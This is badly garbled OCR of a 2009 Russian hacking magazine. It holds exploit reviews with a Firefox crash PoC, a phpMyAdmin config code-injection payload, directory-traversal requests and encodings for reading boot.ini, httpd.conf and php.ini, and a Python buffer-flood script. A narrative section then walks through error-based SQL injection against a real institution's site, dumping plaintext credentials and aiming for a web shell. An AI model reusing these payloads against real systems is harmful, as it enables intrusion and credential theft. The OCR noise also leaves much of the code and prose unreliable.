gТехrЕuпs->RеmоvеFrоmСасhе{tехtRuп) ; <br /> <br /> 3519<br /> <br /> delete textRun; <br /> <br /> Liпuх<br /> <br /> kernel 2.<br /> <br /> б,<br /> <br /> 29<br /> <br /> seful <br /> <br /> 3520 <br /> <br /> ИЬМФffi<br /> <br /> 3521 <br /> <br /> Чтобы побеДИТЬУЯЗ8ИМОСТЬ, воспользуйся патчем из GIT [С!it.kегпеl о r9no~li п ux/ke гпе 1/9 i t/torva lds/li п u х- 2.6,9 il· а=Ь 10 bd iff· f=ke гп el/pt га се. с '<br /> <br /> Приведеннаявыше функция взята из файла lауоut/gепегiсl<br /> <br /> h=0692ab5aOd672341000d1697d7c308c566060fb4'hp=dfcd83ceее3Ь24632<br /> <br /> nsTextFrameThebes.cpp, Рассмотрим подробнее, что же она делает,<br /> <br /> 6cbee2a6eadb27abdba7823'hb=cad81bc2529ab8e62b6fde83a1eOc7f4a872<br /> <br /> Сначала устанавливаетуказатель textRun на mTextRun (34981, Далее<br /> <br /> 0geb'hpl)=ce8a7/,24d23a36f043dOde8484f888971 е831119),<br /> <br /> проверяет, не равен ли texlrun NULL (3500). СНИl-\ает хуке фрейма и Г1роверяет. присутствует ли textrun в кэше, Если да, то удаляетего из кеша, а затем удаляети сам объект, 3акомментированныйучасток кода<br /> <br /> О3<br /> <br /> MOZILLA FIREFOX<br /> <br /> MEMORY<br /> <br /> CORRUPTION <br /> <br /> также содержитошибки. Ошибка в том, что mTextRurJ может содержать некорректные флаги от предыдущих операций,<br /> <br /> - это при ведет к некор­<br /> <br /> ректн о му удален ию [3519) Из-за подобн ых соображе н v\и разработч ики<br /> <br /> иrmi<br /> <br /> MOZilla позднее ввели новуюдополнительную константу:<br /> <br /> Брешь обнаружили Маге Gueuгy и DаПlеl Veditz, после чего та была офи­<br /> <br /> циально опубли кована в базе CVE ICVE-2009-1313), Касается она крзwа<br /> <br /> +<br /> <br /> браузера путем ЭКСГ1луатации ГcJП5ТехtFгаmе:,СlеагТехtRuпl),<br /> <br /> Llserdata for<br /> <br /> ! / Set "'hen rhis а<br /> <br /> сехё<br /> <br /> frame is mentioned in the <br /> <br /> textrun <br /> <br /> + #define ТБХТ_IN_ТБХТRUN_USЕR_DАТА Ох40000000 <br /> <br /> 50/* r'endering ohjec': :or l.,?xt.lJal content<br /> <br /> 3494<br /> <br /> о'<br /> <br /> lements */<br /> <br /> + <br /> <br /> "'tftФIO<br /> <br /> \1Оiд <br /> <br /> Код эксплоита приведен ниже.<br /> <br /> 3495 nsTextFrame: : СlеаrтехtR\.lП ( )<br /> <br /> 3496<br /> <br /> 3497<br /> <br /> ;,/ S()Ve text r1.iП bccause<br /> <br /> CJea:["AllTe)~LRunRe:erences','/ill<br /> <br /> 3498<br /> <br /> g'fхтехtRЩ1*<br /> <br /> 3501<br /> <br /> textRun = mTextRun;<br /> <br /> (<br /> <br /> 3499<br /> <br /> 3500<br /> <br /> <html:><head><tit1e:> B\lg 489647 clear<br /> <br /> if (!rexrRun)<br /> <br /> rеturп; <br /> <br /> 3502<br /> <br /> J'<br /> <br /> В<br /> <br /> 3503<br /> <br /> f)UrS<br /> <br /> 1,9.0.9 topcrash<br /> <br /> <body> <div<br /> <br /> ,д=»а»<br /> <br /> styleo=»whlre-space: pre; »><br /> <br /> m</div> <scripc> fuпсtiоп<br /> <br /> UnhookTextRunFromFrames(rexrRull);<br /> <br /> Ые",<br /> <br /> [@nsTextFrame::C1earTextRun()]

doe ()

docLunent,getElementByld('a') ,chi1dNodes[0]. ХАКЕР

06/126/ 09

ОВ

ОЕа0Р

ОБ30Р

ОБ30Р

3КСПЛОIJТОВ

3КСПЛоIJТQ8

3КСПЛОIJТОВ

»

Fonn_

..........

"",bl",,[:lJ6

F:.rmTIt1e:

[~Ь@" 5......



О

AuLl':orA~:

Ct:.nSi~ cтн(~ Ьу:

Мninш10r

ТittyMCEli;l\t

_.

~

~-6

Orw=

O(O!fe<1f<;<Ы ••,,} ~ О

О

Rio..·rrit3:I:re~fdd.i:te:

_",JO

'.9!rg.-ll.J.D 00;00;00 P,,;!;{'$h

и;<,:

_

---=.JO

19~11--3000:00:00 PlJЬ!М\Di:м:n:

_---=.J6

N8NИ

10:

КОМПОНЕНТ АRТFОRМSСОБСТВЕННОЙ ПЕРСОНОЙ

VU?EN ~­

'iliiii Н

HUal8 [n1Jd

·l'b"tп_IbI:.О·ш:.IPn,~еlеЕКilLmм

.

1
Vulamllliity

1i1~: ~ I:em~ ·Фщ.it'.ю(f·L'ХАIPri-n!~~"JJ~~~

12 13

VLl'EN!О:WPБ'l/W!'N!I9'~

CVEID:CVE-2009·lS27 R~е4f$:l'!OOшteR~D

Р.е.'D&.tI,Щi«tаы,;1+:I

/**

* Stores default

РМА

сопЕ ig

config from

_default.

php

I.oc.Wffl~:'r~

~*и D~; m·IЗS·04

;:, ~lIl~ra!!ГП1' 1Ia, !Ittл иrr,!lItd I!I ~ Ktrn~, "h;dI arJd Ье щ-/о;~ ~~ J loJCaI3ttad:~ Ь ~;a, r'!le:~пd

~~t9CS. Ths i:lW! i$ cMt'd d~'f t;I) l1!t 'ptт~_ ...'t«Ь(J' l~arndlptrbC:'.L] h!i'l::IIX, .щ

·!7,,!:t:it-:С'd,шс_:-:,~:(mtj.d ·~"'o~·:Cиec_rr ....~t·. ~'1idJ (;1J:j,d ~ЩI m.ШJcш IISlJstп ~UI rnat

14

* @var array

15

*/

16

ЭКСПЕРТЫ ОЦЕНИВАЮlРИСК ПОВЫШЕНИЯ ПРИВЕЛЕГИЙ НА LINUX

259 260

РЯ НА ТО, ЧТО ТРЕБУЕТОПРЕДЕЛЕННЫХУСЛОВИЙ

261

КАК СРЕДНИИ (ЖЕЛТЫ И ЦВЕТ). НА САМОМ ЖЕ ДЕЛЕ МЫ ПОНИМАЕМ, ЧТО ЗАХВАТ МАШИНЫ ДОСТАТОЧНО ОПАСНАЯ ВЕЩЬ, ДАЖЕ НЕСМОТ­

sp1itText(1) ;

private $cfg;

/** .* Creates config

262

* @return string

263

*/

Н1е

264

public function getConfigFile ()

265

{

setTimeout(doe, 100);

266



SESSION['eol'] == 'win')? "\r\n" ;



267



268

После исполненияуказанного кода происходитаварийноезавершение

$crlf = (i sset ($_SESSION [ , ео1 ' ]) && $_



"\п";

= $_SESSION[ 'ConfigFile'];

269

/ / header

270

$ret = '
работы браузера.

279

// servers

IM6i;·blE

280

if

MoziLla Flгеfохдо версии 3.0.10

281

= О;" ".t1mlfМj

282

в новых версиях Firefox уязвимость своевременно устранена.

283

О,

($this->gеtSеrvеГСоuпt()

284

285

\,

286

О)

(

* !$cr1f\$i

$crlf. $crlf; foreach ($o['Servers']

аэ

$ret . = • /* Server;

>gеtSегvеl-Nаmе($id)

ВНЕДРЕНИЕ КОДА В PHPMYADMIN

>

$ret . = "/ * Servers configuration

. " [$id] */"

$id => $server) {

. $this­ $crlf

. '$i++;' . $cr1f;

foreaoh ($server as $k => $v) {

$ret .= "\$cfg[ 'Servers'] [\$i] ['$k']

:::: « Кто бы мог подумать, что во время установки

Phpmyadmin мы

28'1

можем произвести эксплуатацию кода' Рассмотрим вни~~ательно

288

сорец, использующийсяустаНО80ЧНЫМфайлом для формирования

289

конфига:

290

ХАКЕР

06 /126/ 09

var_export ($v, true) . ' . ' . $cr1f; $ret

$crlfi

»

в::лоМ

::~:~M" ~ ~ ~

OE;~OP 3КС;ПЛОUТОВ

OE;~OP 3КС;ПЛОUТОВ

1\ '~

Dhgm'lаdmiп.svп.sоuгсе~t/\liеwvс/рhрmУ<Jdmiп?viеl'l-геv&гevis iоп-12342 .

• ph р myad m i Il.5VIl.SO U('cefo 1'9 е. net/viewvc/ph gmyad m i n ?viеw-геv& гevis iоп~12З48.

РАСКРЫТИЕ ПУТЕЙ

05 ~fti:t~1:~~~~~~~~~1

ОГРОМНЫЙ СПИСОК УЯЗВИМОПЕЙ JOMMLA, ЛЬВИНАЯ ДОЛЯ КОТО­

РЫХ СОДЕРЖИТСЯ В КОМ ПОНЕНТАХ. ВСЕ ЭТО ИМЕЕТ НА СВОЕМ БОРТУ JOOM5CAN ДЛЯ ПРОВЕРОК

BZERVIТ

WEBSERVER 4.0

fmШj. КлассифИК<JЦИЯ подобной атаки -

Directory Traveгsal. В литературе и сов­

ременныхсистемах классификациивектор атаки казывают Path Traversal. Сам ый большой риск, KOTOpbl й она влечет за собой, CKpЫ8aeTC~ не только

в листинге директорий, но и в обходе ACL -листов. Эта техн ика ата к направлена на получениедоступа кфайлам,директориями командам, находящимс~вне основнойдиректорииWeb-сервера.Злоумышленник

может манипулироватьпара метрами URLc целью получениядоступа

291

$r'et

, 1*

E.l.ld

of servers configuration * /

I

Web-сервера.Для подобныхатак потенциалы,оуязвимолюбое устройство,

$сгН;

. $crlf

к файлам или выполнить команды, располагаемыев файловойсистеме

имеющееWeb-интерфеЙс.Многие Web-серверbIограничиваютдоступ

292

пол ЬЗО8ателя оп ределенной частью файловой системы, обычно называе­

Итак, функция getConflgFILe[1 В03враЩ<Jет всякого рода информацию

мой «web docuгnent гoot» или "CGI гоо!}). Эти директории содержат файлы,

Здесь составляется конфигурационный файл. и $гet инклудит РН Р­

предназначенныедля пользователя, и программы, необходимыедля

код. На 281 строке мы видим комментарий, а затем еще один

U* Seгver:

получения доступа к фун кциям Web-приложения. Большинство базовых

«id» */1. Обрати внимание: выходиттак, что $id полностью

атак, эксплуатирующих обратный путь, основаны на внедрении в

контролируется пользователем сразу, К<JКТОЛЬКО переменная была получена

символов " ../}) - для того, чтобы изменить расположение ресурса, который

URL

из сессии [267J. Скажем, если пользователь передаст ее установленной в

будет обрабатываться сервером. Посколькубольши нство Web-серверов

виде "bLeh */ /*», то тем самым он завершит конфигу­

фильтруют эту последовательность, злоумышленник может воспользо­

рационный файл строкой «/* Seгver: bleh

*/
dateO:?> /* */».

ваться альтернативн ыми кодировками, например, Uпiсоdе [" ..%u2216» или «.. %cO%af,,!. Другие популярные приемы - использование обратного слеша k.\») в WlПdоws-серверах,символов URLEncode 1«%2e%2e%2f})1

овиш

или двойная кодировка URLEncode k.%255c»J.

phpMyAdmin 3.х [до 3.1.3.2.]

Даже если Web-серверограничиваетдоступ кфайлам определенным К<Jталогом, эта уязвимость может возникать в сценариях или

CGI-npo­

$1fiфfflfii

граммах Воэможностьиспользованияобратного пути в каталогах

Требуется огра н ич ить передаваемы е A<J н н ые с помощью pregJeplace!J:

довольно часто возникает в приложениях,использующихмеханизмы

шаблонов или загружающихтекст страниц из файлов на сервере. В этом

foreach ($с l' Sелтегs' ] as $id => $server) ( + $k = preg_replace(' / [AA-Zа-zО-9_]/', '_', $k);

$ret .= '/* Server: ' . [$id] */' . $crlf

$this->gеtSегvеГNаmе($id)

варианте атаки злоумышленникмодифицируетимя файла, передавае­

мое в качестве пара метра CGI-програММbIили серверногосценария. В реэультатеОН может получить исходный код сценариев. Нередко к имени

запрашиваемогофайла добавляютсяспециальныесимволы, такие хак

"%00,,, с целью обхода фильтров. Бывает, что при эксплуатациитакого и применить офИЦИ<JЛЬНО 8ышедшие обновления.

рода уязвимостейв ответ на их популяРНОСТЬ при меня ются IDS-систе­

мы, которыеурезаютзапросы с «хождением»ПО каталогам ["/../../../»]

УСПЕШНЫЙ ОБХОД И ПРОВЕДЕНИЕАТАКИ «DIRECТORYTRAYERSAL» .~'

вариациоfНiOЙrлубины. Требуется помнить, что кроме стандартного

символа мы можем использовать, к примеру," .\. раЗН08ИДНОСТИ

кодированного содержимого

\», «..1..\..1..\», а также

.

ТИПИЧНЫЙ ОТВЕТWЕВ-СЕРВЕРАПОСЛЕ ИСПОJilНЕНИЯ PROPFIND

061ZSJZOOl

01:26))

<:))]А;.

DOC\DIOII!Dt,S '!Шd Set-:.lng'::

ОЦ25!2001

12:~q.IJ

-<J)[II)-

I.III:t~\Ib

061,5/2001

а:"1Эр

Q6/2S/2001

01'i:?p

<1)]11.)­

о

Y~le.ts)

1

Dir(~1

Proar" а

2,178,79.,56:;)

rlle~

'IЮП

J:lytes

Ь~tеэ

q

1­ .-- .. ---­

~sponя Codt:

2D7

~;

HTTP/1.12D7Multr-st.tш

-:--,'

~~I;!H~

J::I:"ee

D.I<:Мon,23

Aug 199920:21:24 GI'1T

050"'0" Ар • .м/1.3.6 (Unix)DAY/O.9.B OConnf'Ction: close ОТr~r-Еrюodtn9:chunkfod

OCorrttnt

M

Тур,;

i.tJct/xml;

е:hlJГstl:=..

utr-s"'

О

063! ОаФ:mY"ist.rtus

.xmlns:-J)=-оАV ;")DФ:г~spоl"l$"e'>О

Ф :hn?f>/foo.ljlif
ОФ :stitus>HТТP /1 . t акO/bar -9П Q ~;Pf"C)I)S't~t>QФ:рrор)[]фум:ourct'typfl)(/t):Рr'ор>Оф:statu:s)НТТР/t.1 200 1)К (/О ;sЦws:>[] ОQ<О7@sрanS'e>QФ:hrE'f>/соруtts:t/t]Ф~ps1~)[ЗФ:рrор)[],~ Ф:l"'6OUroe~)Ф:ооlltсtЮn/>:NSOUrсеtур4-)QНТТР/I.t 200 О'К

200

~~=:::~<=~;=~~:;;~~~:6:~~~~~%~~~~ Ф:rмponse>Dф:hrеf>/tm/

[!

Qф :prop>O

:colk!c1ion/)НТТР/1.1 200 OК(](/O :response>OОф :href>/maГJU.tl DФ :prоpsut>[]Ф :prop>Q Ф:r~ourсе~><О :collec1ion/>DНТТР/1.1 200 01«/0 :staw:P Ф:rf'Sоur<>etype.)ф

{]Ф ~I!')(]lindм<:.htmI<1D kеf>QФ :propsW>D-Ф :ргор>(] Ф :resoc.rc!'typI!'/>D<О :$Utus:>НТТP 11.1

~ 046

2DO

ок [)
[]

ХАКЕР

l.J ....

i

06 /126/ 09

08

ОБ300Р

ОБ~ОР

ЭКСnЛОUТО8

эксnлоuтов

»

B3:AOIY1

I~

·~ИЗ

·

нозт IP:

$,еn4 R~.,ues!. J

· R"~ouru: Ш",.

*

Мetho41 РROPl"IIФ I J .

Namt:

· P"ss'W"ord:

· Oestin,,'ion:

3. httpd.conf - файл описания опций WE8-сервера Apache [+ его проиэ­ водных).

· . / .. / .. / .. / .. / , . / .. / . . 1 . . IProgram Files\i\.pache Group\

Apache\conf\httpd.conf · . / .. / .. / . . 1 . . / . . 1 . . / .. / ..

t

/Ргоgrаш

Files\Apache Group\

Apache2\conf\httpd.conf

<propfind Xmlnf="OAY :") о(ргор>

~r.SOUl"o.typ./')

ПРИМЕРЫДЛЯРАБОТЫ CWEBDAV МОЖНО НАЙ'ТИ,ЗДЕСЬ (WEBDAV.ORG/GOLIATH/DAVEXAMPLE.HTMLJ

I

· ./ . . 1 . . / . . 1 .. / .. 1 . . / .. / .. /Prograrn Files\xampp\apache\

conf\httpd.conf 4.Логи доступа vo ошибок.

· .! .. / . . 1 . . / . . 1 . . / .. / . . 1 .. 1 . . /Ргоgгаш Files\!'.pache 2e%2e%2f - . . 1

%2е%2еl

·

.%2Е

Group\Apache\logs\access.log

- . . 1

· . / .. / . . 1 . . / . . 1 . . / .. / .. / .. / .. /Prograrn Files\Apache

Group\Apache\logs\error.log

- .. 1

%2е%2е%5с

-

%cl%1c - 1 %сО%аЕ

.. \

изБыочныыйсписок путей конфигов и наиболее важных для неавториэи­

(иТР-8)

рованногопросмотрафайлов можно найти в подборке ettee 1~lпtiсhаt.гul

- \ (UTF-(3)

thread49775.htmlJ. В адваЙзори. которое было опубликованона mi(w()rm. Некоторые ю представленныхвариантов платформозависимыи при­

ГО80РИЛОСЬо Метогу Соггuрtiоп по такой схеме:

годны далеко не на каждой системе.

import socket

Ф=tФm

Са ма эксплуатация состоит в посыл ке злонаме ренного GET -за проса:

hos t = "127.

О

. О .1"

port = 8080 GET 1 .. 1 .. 1 .. 1, .1 . . /boot.il>i HTTPI1.1 User-Agent: Opera/9.64 (Windows NT 5.1; U;

еп)

try: for i ;",

Presto/2.1.1

#

Host: localhost: 80 Accept: text/html, application/xml;q=0.9, applicationl хl"ltпй +хnй,

irniще/jреg,

irnage/png,

\,Е;В-сервера РОSТ-запросами с 60)'(ЬШИN буфером

irnage/gif, irnage/x­ bu f f =

xbitrnap, *1*;q=0.1

3 33 О

"POST" +buff +" HTTP/l.O" .АР_INET,

socket.SOCK_STREAМ)

Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=O ТЕ:

=

connection = socket. socket (50cket

Accept-Char5et: i50-8859-1, utf-8, utf-16, *;q=0.1 Connection: Keep-Alive,

*

"а"

request

еп-US,еп;q=0.9

Accept-Language:

гапgе(1,10):

организуем десятикратное повторение заброса

conneccion.connect( (host, port))

ТЕ

соппесtiоп.sепd(геquеst)

deflate, gzip, chunked, identity, trailers except:

Ответ:

ra",-input (' \n\nUnable to

HTTPI1.1 200 Sелтег:

Х-Роwегеd-Бу:

Press

'Епl:еr»

to quit .... )

Рассматривая проблеt-1у ближе, приведу детальный анализ. почему же

ОК

Zervi t

соnпесt.

О.

4

так получается.

сагЬопо

Вот ИСХОДliИКИ:

Connection: close

Accept-Range5: bytes

Http.h,

Content-Type: application/octet-stream

69 struct http_data(

Сопtепt-Lепgth:

70

SOCKET sck;

71

char file[512];

72

char keep_alive;

73

char

даса

74

char

usег_аgепt[512J;

75

uпsigпеdlопgрtr;

[Ьооl:

355

loaderJ

timeout=30 default=mul ti

(О)

disk

(О)

rdisk (О) partition (1) \WINDOWS

[operating systenl5] mull:i

(О)

Windows

disk ХР

(О)

rdisk (О) partition (1) \WINDO"/S= "Microsoft

ProfeS5ional" /NOEXECUTE=OPTIN IFASTJ)ETECT

[2048] ;

76 ); Http.c: 13 void parse_ht tp (struct ht'l:p_data *"'5g5)

Естественно. Bt-1еетО обращениS'l к Ьооt.IЩ t-10ГЛИ бы быть'

14

1. Конфигурационный файл хоетинг-панели Срапеl-/vаг/срапеU cpanel.config.

21

if(stгсшр(сh,"GЕТ")==О)(

2. Файл настроек функционированияРНР - PHP\php.ini. · . / .. / .. / .. / .. / .. / .. / . . 1 . . /HINDOWS\php. ini

24

ch=geC_word(rnsgs) ;

25

5trcpy(msgs->file,ch);

· . 1 .. / .. 1 .. 1 . , 1 .. 1 .. / .. 1 .. /WINNT \ php . in i · .1 .. 1 .. 1 .. 1 .. i .. 1 .. 1 .. 1 . . lapache\php\php. ini

Типичное использованиенебезопаснойфункции stгсруи буфера t-1алого

· .1 .. 1 .. 1 .. 1 .. 1 .. 1 . . / .. I .. /xarnpp\apache\bin\php.ini

размера l Это все объясняеТ.I

ХАКЕР

06 /126/ 09

»

Е:3ЛОМ

~////л

Х MORO

I [email protected] I

Х MUXX

1 MUXX@BK.,RU I

КЛАССИКА

ПРОНИКНОВЕНИЯ

ОТ ИНЪЕКЦИИ КАдминскаму ДОСТУПУ по

RDP

Любой взлом преследует цель, которая определяет его ценность. 3адефейсить сайт для латентных любителей клубнички или поиметь очередной рутовый шелл

решать тебе. Реалии таковы, что любая

-

уязвимость в web-приложении таитугрозу для сервера. И если ты не ограничиваешься банальными и уже слегка поднадоевшими инъекциS1МИ

- статья длS1 тебя. На входе адрес жертвы, на выходе

админский доступ по •

SQL­

ROP - классика проникновения l!

ПРЕЛЮДИЯ,

тихо и мирно. Итак, заветнаяфраза «iпsitе.ism

Все оказалось настолькотривиально, что не воз­

ИЛИ КАК ВСЕ НАЧИНАЛОСЬ

WS», кнопка Search и ... можно считать, что дело

никало ни 1'ени сомнения в успешностидальней­

А начи налось все банально, Сначала был

сделано?

шихдейст~ий Привычная сине-серая страница

URL,

10000 результатов

oTGoogle обещали

ошибки СоldFusiоп,представшаяперед глазами,

Кому-то этот URL был почему-тоочень интересен.

Порядка

и надо было гл~нуть, что С liИМ можно сделать.

кропотливую работу. Лис быстро обзавелся

открыла взору и полный SQL-запрос, и тип

URLсразупопалклису, который быстро выдал

вкладка~,и, в которые полетели вс~кие кав ычки,

СУБД !SQL Sеrvег), и локальный адрес скрипта

результат: институтилитипатого,куча ссылок,

равенства, дефисы и прочая нечисть.

потихонькуподнимаЛОСI,.Мне всегда нравились

ГЛАВА 1, ИЛИ ВСЕ МЫ ГРЕШНЫ

сайты с большим количест80мзна КО8 вопроса,

Практика показывает, что почти любой круп­

параметрамитипаid и числовыми значениями

ный ресурс имеет инъекции Хоть маленькая,

влинкаХ ... Аздесьихбыло, прямо скажем, не

незр~ча~ и фильтруемая инъекция, но есть

ро перескакивалапо ссылкам, и настроение

Вообще, информативность ошибок, выдаваемых

Cold Fusiоп, просто поражает - даже полн ый стек

новости, меню и прочая лабуда. Мышь быст-

вызовов. берv., не хочу. Инъекция найдена. пора приступать к внедрению.

меньше, чем мусора на свалках,

наверняка. Надо лишь присмотреться. Вот и

ГЛАВА 2, ИЛИ ДА ЗДРАВСТВУЮТ ОШИБИИ

Глянув на иконку любимого сканера и ухмыльнув­

здесьзаветный плод был найден по адресу

Сервер БД он,елкомягкихвсегда поражал 803­

шись, я решил все-таки ненапр~гатьадминов,

h l tp :I!wwvo/. isrn .'ivs!Ap plica tiопs!Fогrns!

можност~~,и Я не говорю О стандартах,которые,

а обратиться к Великому Индексу и решить все

FогmОisрlау.сfm?Fогm I0-8464.

В общем-то,все разработчикиСУБДтрактуютпо­

~

048

ХАКЕР

06/1261 09

~

~IJ.

[)oo:t,<4

»

".

~I,

~'_T

..

IJ'~.

6::лоtv1

._,. __

С Х w 1:~IIt~;,i~:Ш;;:;~~}~'JOIIII:,~i-~~:.~ .ji.;~ :0" ~c_мn.~

","-1~ .~f_~",

r:\дc,пaaW'!tl~!mI!II

!> 5I!tIS<.o:\· . ' : .

~'

'$I!II'&O:

~

z:: . .". wt't::!':I.

SC,"""Sl:r;, ,,!:!ot.

e()мb~' ~,"'*'t~'.:зQ5'~F",,,,, ~П~'i131'fо3'rI:~- ..;.."""~- /CA

·~;RНC!I·

/ioai!·[I ....... s.u"'·

Tne web site you аге accessing has experienced an unexpected Please contact the webslte administrator.

'М,;!!,,,;;';.';

;:

еггог.

ZE&~~.~§~-~':':#4!"!!!,,,!';!'i!'!!:::LJ:::::::.i8l1iiiiiiiliillliillili1!Ei!щ

Щ4'Щ·§.$М§d5Ч #W!фU&' '4"';; '&

1F.)тor Executinq Dabtbase Query.

fI14tr.",~.;T.XSQI.S."",'IOII(;O"""J(SQl.S."""<1tinl~;Z:[~00I'I'~e:t:H"''''~n'~'

...". 00-"

\)0,0.

'"".-

_

~

""'-

1:'~\~':"'1'~;~:y~~;:'~II~~e:su.b\IIDC9mm9P\tm5~o"'\'''''I;.,ti on'\p"bI( ~~~ ~ :::=":I.. ~~::--''''''''~!!.:.!:'.~''''''~~Ъ;;оо!l'&'Iq -1~-=­ )( ...

~~:::::::~~~~::~~~:=:~~::::~:~~::~:~~:~:::::~:~o ~::::~ 51 : и

:

~.



:;::: ~;~~:~~::::::::::=~~:::~:~~~:::~:~:~:.

III1.С"Е Т'. TeIOP1,,~e7Ypoe • 'ro,,,,' ,,'--- »tD db" __ 1Vi~Y('$~~:;

AIID R.t:nl1t.rl'1l _ OiUl~R В!

5.5 :



~



".><~-_ ....... ; SL»t ....._ . . . . . - ~_I' ~~-

o ...>tIO· э .._· .,;t ..... :':I_ ... L_' 010"1''''''-'' _ _ о ,1... ·

The web slte you аге acremng has Qxperlenced ап unexpeeted error.

ClIlred INlm O;\lnc\il'ltl\llOCgmmon\crмa:(e\;'DDIic,aoons'lDublJcVom'Is·'O"If~

.ro........

. / _ . : : ......

PleaSQ contat;t the websitli1i admiltlstrator. -.

R.Reso"'t<:eWo.-:о:

~

.

. , ' '!

'



(

...

,

"'

J

~

).



,

(m;.ro.»rre~,·ihI"'~]F:·~.~

,,/ e.tq\le ,у> ~LfСТf\.·.Т.·,F.·,'Нf,l.к_ ••• Нs.dеrl'.u..РТ2.f,:е

'п.SttOJO.Н2.s"otеJO.51-11.СfМо~рi"'iТоlndud

•••• Н ••d.

~~go~:~iт:~:I~~.~e~:s~~:::~~ ~.:;'~~~:i·RR] T.En\ittID_f.fnti!yIOlotIJOINPТ.Pro.eMoOti."Terтu>I .....

'ОС

PТ1.En~. . yIDlef'l:)QIt.lPТ_'~.cnt.,;onTemplЫosPiZenffo

'

:;\.': ~~,~~.~Т;:.~,--:\....--. .._,..........\ •• oII, .....,,'\... btI'\'О<1'n­

loIl.... ""

.........яОС_.......-.--...~

О,\I

e.1Io4"'-о,~.".r.c-.мo..........,.~.,.~

__

l

\f~I.6n'w~r

.. _OV~r"""''"'

1.ltюln5м..$~.<sI'41OfIl'n.s~"lo_ SI'\1.S;~1D"NO 5" :~:::-.:::::~=::=:::::::==;~;=::=:~i~

'"."d,,-оID .. SМi.S·

I

o.aT"SOOR.CE

;i~~';~E~f T.Templbt"Тype ~ "0''''' ANOII,.E<М1 :~:

V~NOORf:RII.ORt:OO~ 1;'\1 SQL.SТ"тt

~;";.",,,,o'~~':"'f~':-:._\f"~'4"'''''''

:,:;-;.:~.:-;.;,:'f~·;:::::....,........,..•. t.Ш'1S~~.R.1' ... ",JDJ ~ 1

)~ ,

__ .,

.:041"'" ., , ... I••((~­

I
l'I..o ..... ~,

bl'I.LCTl.·.'.-.'.·.fnJ

,.. "

ОТ:

..

.• :Iof<

.

ott,

~~:~~~';:i:~:~.t;=':.:~.:..:.>(~>o, ..

.. fl_II't_._"'_ сl'l.~'m.O'I.I~

..

tfЖl~,II)-I.tw:oto~»1Nt1';J_ ...... ш."~

Т_

....

I...

_'~""_

~!1 OOI'!ooQ'otIJUL.w·_ ' _ _ ""'DI_~lr '~'I"_"'1~<'"I<\ IoIIJoI1lC>'L&iooff.tIJ_~.~ID_· ........ .$eo(O~~.~t"._

""".-.о,

ИНЪЕКЦИЯ

Mlcrosoft, вообще, каким-то

...

:~':"'~~:;;;_=-:::1~-:::.;.;:'J:.':!.~~

НАЙДЕНА!

разному Но парни из

_er

·"'.·.,t-..._ .... )I):'f$IO.$>In~or:,rn.3.МIО·:I"'l.~I,,_$"!~t .... •._(...... ~·.II!.~'.'_.t;Н-l'_·aJ
~~~~cO)O(! ~~F·=::.·

. .". .,. "".. . .

_t) ••• ~ . .,..,• •~ • •• ""......_ .

невозможно, что вусловиях нашего нереаль­

сайтразработчиков, а сама

ного взлома ну совсем никак не удобно. Можно,

носит гордое название Results Dlrect. Зачем в

нравится работать с SQLSeгver. Не надо ни коли­

конечно. пойти стандартным путем: получать по

базе хранить учетные данные, я так и не догнал,

чество колонок подбирать, ни ихтипы - ошибку

одной записи, запоминать и яв но исключать из

но к

на преобразование вызвал, и в ответе вся инфор­

следующих запросов. Но м не этот метод совсем

с и менем ism ws prod code и вовсе на вевала

маЦИ51 из базы, как на блюдечке. Оченьудобноl

не В кайф' и автоматизации трудно поддается,

радужные мысли, которые. к слову, быстро

Сначала провер51ем возможность вывода.

да и длина

подтвердились Корень FТРбылоченьпохожна

своим, HeaeДO'~ЫM путем идут. Мне, например,

http://'~.ism.ws/

URL не резиновая - для больших баз

CMS, оказалось,

Itp они реально подходили. Аучетная запись

накроет нас медным тазом

корень самого саЙта. После тестирования доступ­

Поэтому мы всех обмане,~ Сортируем вверх и

НОCl'и нескол ьких скриптов факт отображения

Applications/Forms/FormDisp1ay.

вниз - получаем приемлемый пеЙджинг. Сервак

папок и файлов был окончательноустано[3лен.

cfm?FormID=8464+or+l=(se1ect+@@

пощадим идобавим условия на проверку названий

Доступ по FТРоткрывал широчайшие перспек­

version%2bchar (56) %2bdb_

полей

ТИ8Ы по залив ке фа йлов на сервер и избавлял от,

name()%2bchar(58)%2bsyste:n_

Нуа для того, чтобы совсем круто было, определим

казалось, неминуемых приключений по раскопке

user%2bchar (S8 J %2Ь@@sег\геrпаше}-­

для начала их количество iпримеры запросов

функционала админки и поиска ВОЗМОЖI~остей

смотри во врезкеJ. Воттаквот-их9 Поехали l

получения шелла.

80тветполуцаем ошибку:

- пусть они пароли какие-нибудьсодержат

Сразубросилась в глаза табличка Е5_Lоg'lпlпfо

[Macrcmedia] [SQLServer JDBC Driver]

Password] В общем-то, ,~ожно поти рать руки и

ГЛАВА 4. _ ИЛИ ХОЛОДНЫИ СПЛАВ

[SQT_Server] Syntax error convert iпg

заказывать пиццу, но не тут-то было. Определив

Что делать с FТР,полагаю, вопросов ни у кого

струК'турутаблицы, я получил следующую картину.

не вызывает. На ум сразу приходитобеспечить

[RDCMS-ISM-Core: dbo' ЕS_Lоglпlпfо.

the

п·vаrс]-й.r

SеЛlеr

Мат

valL\e 'Microsoft SQL

2000 - 8.00.2050 (Inte1

7 2008 21:29:56 Copyright

1988-2003

Иiсrоsоft

S tапdаrd Edi t i (!3'-li1б

f data

(с)

Corporation

оп оп !,~ir.dows NT

5.

О

2195: Servic<J Pack 4) :RDCMS­

ISM-Core: rms: о

Х86)

-суре

IS1~SQLOl'

to

а со1uroш

int..

Втаблице присутствовалотриинтересных поля

выполнение команд на серваке и выбрать-

EntltylD, Usегпаmе и Password Думаю, объяснять

ся, наконец, на свобод)' из душных объятий

не надо, что я быстро составил новую сери ю

web-приложения. Очевидно, нужен веб-shеll,

запросов и моим глазам предсталиданные юзве­

который позволит бродить по серверу и выпол­

рей. Пароли хранились В открытом виде и можно

нять команды, Но вот беда - никакихследов

было сло,~я голову кидаться на сайт в поисках

РНР или, на худой конец, Регl обнаружено

заветной админки. Я, кстати, когда добрался до

не было Азначит, момент истины наступил:

исходников, долго и тупо втыкал, поче,~у нельзя

придется программить на СоldFuslOП Очень

Имеем сервер не первой свежести и базу RDCMS­

было шифровать пароли, если парни-разработ­

гибкая и простая в освоении среда [по словам

ISM-Core. Внимательно присмотревшись.Я бук­

чики CMS это предусмотрели [SHA-l, SHA-512,

разработчиков). но мне почему-то ни разу не

вально подпрыгнул от радости. аббревиатура CMS

МD51 и даже реализовали собственный алгоритм

